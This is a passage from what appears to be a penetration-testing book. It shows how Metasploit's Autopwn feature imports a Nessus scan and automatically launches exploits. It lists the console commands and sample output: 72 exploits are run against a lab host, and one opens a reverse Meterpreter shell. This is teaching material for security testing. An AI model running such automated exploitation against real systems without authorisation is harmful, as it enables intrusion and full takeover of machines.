Let’s take a quick diversion into exploitation. Metasploit’s Autopwn tool automatically targets and exploits a system using an open port or using the results of a vulnerability scan export. You can use Autopwn to harness the results of most vulnerability scanners, including NeXpose, Nessus, and OpenVAS.

For example, here’s how we could use a Nessus results import to target a system and autopwn it. Create a new database with db_connect and use db_import to import the scan report. In the next example, we run db_autopwn with a series of switches to launch attacks against all targets (e), show all matching modules (t), use a reverse shell payload (r), select exploit modules based on vulnerability (x), and also select based on open ports (p). Once db_autopwn launches, Metasploit begins launching exploits at the targets. Successful exploits return a shell to the attacking machine.

msf > db_connect postgres:[email protected]/msf3
  msf > db_import /root/nessus.nbe
  msf > db_autopwn -e -t -r -x -p

 [*] (1/72
 [0 sessions]): Launching exploit/windows/mssql/ms09_004_sp_replwritetovarbin
      against 192.168.33.130:1433...
  [*] (2/72 [0 sessions]): Launching exploit/windows/smb/
psexec against 192.168.33.130:445...
  [*] (3/72 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against
      192.168.33.130:445...

  . . . SNIP . . .

  [*] Transmitting intermediate stager for over-sized stage...(216 bytes)
  [*] Sending stage (718336 bytes)
 [*] Meterpreter session 1 opened
 (192.168.1.101:40912 -> 192.168.1.115:15991)
  [*] (72/72 [1 sessions]): Waiting on 2 launched modules to finish execution...
  [*] (72/72 [1 sessions]): Waiting on 0 launched modules to finish execution...

Based on these scans, Autopwn launched 72 exploits and one was successful, as shown at . This exploit allows us full access to the machine with a Meterpreter console that will be discussed in far more depth in Chapter 6.